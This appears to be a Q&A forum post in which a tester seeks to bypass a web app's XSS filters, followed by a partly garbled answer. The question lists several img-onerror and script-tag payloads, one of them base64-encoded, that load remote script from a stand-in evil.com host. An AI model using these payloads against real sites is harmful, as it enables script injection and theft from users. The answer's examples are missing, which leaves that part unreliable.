I have found a web app that is vulnerable to XSS, and can get some javascript running using an img
tag, however the method I am using destroys the rest of the page, as they are using some filters to attempt to stop it.
The filters I have detected so far are as follows:
</anythingyouwant>
gets replaced with nothing/>
gets replaced with nothing;
gets replaced with a space until the next>
- 135 character limit including method of delivery ex
<img src="." onerror="alert('xss')">
Injecting <img src="." onerror="alert('xss')">
works fine, however these developers are rather sceptical and wish to see a full PoC of full javascript code. Is it possible to run an arbitrary script at all?
I have tried:
<img src="." onerror="eval(atob('Yj1kb2N1bWVudDthPWIuY3JlYXRlRWxlbWVudCgnc2NyaXB0Jyk7YS5zcmM9Jy8vZXZpbC5jb20vbXlzY3JpcHQnO2IuYm9keS5hcHBlbmRDaGlsZChhKQ=='))">
result: too long, even with a shortened URL<script src="//evil.com/myscript" />
result: can't close script tags like that, and it gets filtered, and it destroys the rest of the page by web app omitting 'closing' tag<script src=//evil.com/myscript"></script>
result: gets filtered, destroys rest of page as above<img src="." onerror="b=document;a=b.createElement('script');a.src='//evil.com/myscript';b.body.appendChild(a)">
result: semicolons get filtered, breaks web page<img src="." onerror="b=document a=b.createElement('script') a.src='//evil.com/myscript' b.body.appendChild(a)">
result: im unsure if this is valid js, but it appears in the chromeview page source
as intended, but does not work as wanted
I am using chrome for testing, just in case it's relevant somehow.
The security measures you listed are definitely insufficient. Two examples I could imagine to work for you:
or your version with a
,
instead of a;
:But I am absolutely certain there are many other ways to do that. You could also check the following cheat sheet which I found in this answer.